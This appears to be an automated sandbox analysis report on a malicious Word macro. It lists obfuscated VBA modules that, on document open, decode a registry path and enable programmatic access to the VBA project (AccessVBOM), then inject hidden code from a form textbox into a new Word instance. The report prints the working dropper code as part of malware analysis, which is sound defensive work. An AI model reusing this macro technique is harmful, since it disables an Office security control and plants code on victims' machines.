                callgraph 20 autoopen 37 memoryIndex Quit:1,CreateObject:1 20->37 141 viewValueTextbox CreateObject:1 20->141 239 convertIndex 20->239 75 ptrPtrStorage CreateObject:1 110 exceptionPointer 123 captionBufData Version:1,Application:1 129 mainExLocal 133 listboxNextVar 137 varClass 141->75 x 2 141->110 x 2 141->123 141->129 141->133 141->137 200 textExButton Val:1,Len:1,Mid$:1

                Module: ThisDocument

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisDocument"

                2

                Attribute VB_Base = "1Normal.ThisDocument"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = True

                8

                Attribute VB_Customizable = True

                Module: UserForm1

                Declaration
                LineContent
                1

                Attribute VB_Name = "UserForm1"

                2

                Attribute VB_Base = "0{C70C972A-9359-4393-8302-539D2FF78F23}{25405C50-5AD6-4D56-82F4-D7B1075E12BD}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = False

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = False

                Module: listCopy

                Declaration
                LineContent
                1

                Attribute VB_Name = "listCopy"

                Executed Functions
                APIsMeta Information

                Part of subcall function viewValueTextbox@repoText: vbUnicode

                Part of subcall function viewValueTextbox@repoText: vbUnicode

                Part of subcall function memoryIndex@optionRemoveGeneric: CreateObject

                Part of subcall function memoryIndex@optionRemoveGeneric: Documents

                Part of subcall function memoryIndex@optionRemoveGeneric: AddFromString

                Part of subcall function memoryIndex@optionRemoveGeneric: Visible

                Part of subcall function memoryIndex@optionRemoveGeneric: Quit

                Part of subcall function memoryIndex@optionRemoveGeneric: wdDoNotSaveChanges

                LineInstructionMeta Information
                2

                Sub autoopen()

                3

                viewValueTextbox

                executed
                4

                Dim clearIteratorRef as String

                5

                clearIteratorRef = convertIndex

                6

                memoryIndex clearIteratorRef

                7

                End Sub

                Module: optionRemoveGeneric

                Declaration
                LineContent
                1

                Attribute VB_Name = "optionRemoveGeneric"

                Executed Functions
                APIsMeta Information

                CreateObject

                CreateObject("word.application") -> Microsoft Word

                Documents

                AddFromString

                Visible

                Quit

                wdDoNotSaveChanges

                StringsDecrypted Strings
                "word.application"
                "ThisDocument"
                LineInstructionMeta Information
                2

                Sub memoryIndex(memoryTempTrust as String)

                3

                Set optionPtr = CreateObject("word.application")

                CreateObject("word.application") -> Microsoft Word

                executed
                4

                Set collectionSelect = optionPtr.Documents.Add

                Documents

                5

                collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString memoryTempTrust

                AddFromString

                6

                optionPtr.Visible = False

                Visible

                7

                optionPtr.Quit SaveChanges := wdDoNotSaveChanges

                Quit

                wdDoNotSaveChanges

                8

                End Sub

                Module: refConvertCaption

                Declaration
                LineContent
                1

                Attribute VB_Name = "refConvertCaption"

                Executed Functions
                APIsMeta Information

                CreateObject

                CreateObject("msxml2.domdocument")

                createElement

                DataType

                Text

                nodeTypedValue

                StringsDecrypted Strings
                "msxml2.domdocument"
                "code"
                "bin.base64"
                LineInstructionMeta Information
                2

                Function ptrPtrStorage(constCollectionDatabase as String) as Variant

                3

                Dim vbSwap as Object

                executed
                4

                Dim memCaptionOption as Object

                5

                Set vbSwap = CreateObject("msxml2.domdocument")

                CreateObject("msxml2.domdocument")

                executed
                6

                Set memCaptionOption = vbSwap.createElement("code")

                createElement

                7

                memCaptionOption.DataType = "bin.base64"

                DataType

                8

                memCaptionOption.Text = constCollectionDatabase

                Text

                9

                ptrPtrStorage = memCaptionOption.nodeTypedValue

                nodeTypedValue

                10

                End Function

                APIsMeta Information

                StrConv

                LineInstructionMeta Information
                11

                Function exceptionPointer(captionPaste, memConvertStruct)

                12

                exceptionPointer = StrConv(captionPaste, memConvertStruct)

                StrConv

                executed
                13

                End Function

                Module: repoText

                Declaration
                LineContent
                1

                Attribute VB_Name = "repoText"

                Executed Functions
                APIsMeta Information

                Part of subcall function exceptionPointer@refConvertCaption: StrConv

                Part of subcall function ptrPtrStorage@refConvertCaption: CreateObject

                Part of subcall function ptrPtrStorage@refConvertCaption: createElement

                Part of subcall function ptrPtrStorage@refConvertCaption: DataType

                Part of subcall function ptrPtrStorage@refConvertCaption: Text

                Part of subcall function ptrPtrStorage@refConvertCaption: nodeTypedValue

                vbUnicode

                Part of subcall function captionBufData@repoText: Version

                Part of subcall function captionBufData@repoText: Application

                Part of subcall function exceptionPointer@refConvertCaption: StrConv

                Part of subcall function ptrPtrStorage@refConvertCaption: CreateObject

                Part of subcall function ptrPtrStorage@refConvertCaption: createElement

                Part of subcall function ptrPtrStorage@refConvertCaption: DataType

                Part of subcall function ptrPtrStorage@refConvertCaption: Text

                Part of subcall function ptrPtrStorage@refConvertCaption: nodeTypedValue

                vbUnicode

                StringsDecrypted Strings
                "SEtFWV9DVVJSR"
                "XFdvcmRcU2"
                "REG_DWORD"
                LineInstructionMeta Information
                14

                Sub viewValueTextbox()

                15

                clearReference = exceptionPointer(ptrPtrStorage("SEtFWV9DVVJSR" & mainExLocal & "cm9zb2Z0XE9mZmljZVw="), vbUnicode)

                vbUnicode

                executed
                16

                countSelect = captionBufData

                17

                globalResponse = exceptionPointer(ptrPtrStorage("XFdvcmRcU2" & varClass & "jZXNzVkJPTQ=="), vbUnicode)

                vbUnicode

                18

                clearRefLoad = clearReference & countSelect & globalResponse

                19

                With CreateObject("ws" & listboxNextVar & "ell")

                20

                . RegWrite clearRefLoad, 1, "REG_DWORD"

                21

                End With

                22

                End Sub

                APIsMeta Information

                Version

                Application

                LineInstructionMeta Information
                2

                Function captionBufData() as String

                3

                captionBufData = Application.Version

                Version

                Application

                executed
                4

                End Function

                StringsDecrypted Strings
                "U5UX1VTRVJcU29mdHdhcmVcTWlj"
                LineInstructionMeta Information
                5

                Function mainExLocal()

                6

                mainExLocal = "U5UX1VTRVJcU29mdHdhcmVcTWlj"

                executed
                7

                End Function

                StringsDecrypted Strings
                "cript.sh"
                LineInstructionMeta Information
                8

                Function listboxNextVar()

                9

                listboxNextVar = "cript.sh"

                executed
                10

                End Function

                StringsDecrypted Strings
                "VjdXJpdHlcQWN"
                LineInstructionMeta Information
                11

                Function varClass()

                12

                varClass = "VjdXJpdHlcQWN"

                executed
                13

                End Function

                LineInstructionMeta Information
                30

                Function convertIndex()

                31

                convertIndex = UserForm1.TextBox1

                executed
                32

                End Function

                Non-Executed Functions
                APIsMeta Information

                Len

                Chr$

                Val

                Mid$

                StringsDecrypted Strings
                "&H"
                "&H"
                LineInstructionMeta Information
                23

                Public Function textExButton(ByVal tempClearIndex as String) as String

                24

                For arrayOption = 1 To Len(tempClearIndex) Step 2

                Len

                25

                titleSize = Chr$(Val("&H" & Mid$(tempClearIndex, arrayOption, 2)))

                Chr$

                Val

                Mid$

                26

                trustStruct = trustStruct & titleSize

                27

                Next arrayOption

                Len

                28

                textExButton = trustStruct

                29

                End Function

                Reset < >